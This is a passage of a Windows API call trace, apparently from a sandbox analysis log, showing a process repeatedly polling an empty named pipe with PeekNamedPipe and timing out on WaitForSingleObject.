lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.078] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.109] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.109] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.141] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.141] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.170] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.170] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.203] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.203] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.233] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.234] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.265] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.265] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.311] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.311] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.530] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.530] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.561] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.561] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.591] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.592] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.624] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.624] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.654] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.654] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.687] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.687] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.716] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.717] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.749] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.749] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.779] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.779] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.811] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.811] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.841] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.841] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.874] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.874] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.903] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.904] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.935] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.936] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.966] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.966] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.998] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.999] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.028] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.028] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.067] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.068] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.091] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.091] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.123] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.123] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.153] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.153] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.185] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.185] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.216] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.216] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.452] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.452] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.482] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.482] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.512] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.512] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.544] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.544] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.575] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.575] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.607] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.607] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.637] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.638] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.669] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.669] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.699] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.699] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.732] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.732] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.762] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.762] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.794] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.794] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.824] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.824] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.856] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.856] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.886] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.886] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0104.919] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.919] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0105.762] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.762] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0105.865] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.865] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0105.943] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.943] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0105.970] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.970] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0105.995] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.995] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.025] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.025] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.057] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.057] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.096] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.096] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.120] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.120] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.151] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.152] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.182] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.182] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.213] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.213] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.245] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.245] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.288] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.288] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.307] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.307] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.337] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.337] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.383] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.383] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.400] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.400] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.434] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.434] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.462] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.462] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.494] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.495] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.524] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.525] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0106.556] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, 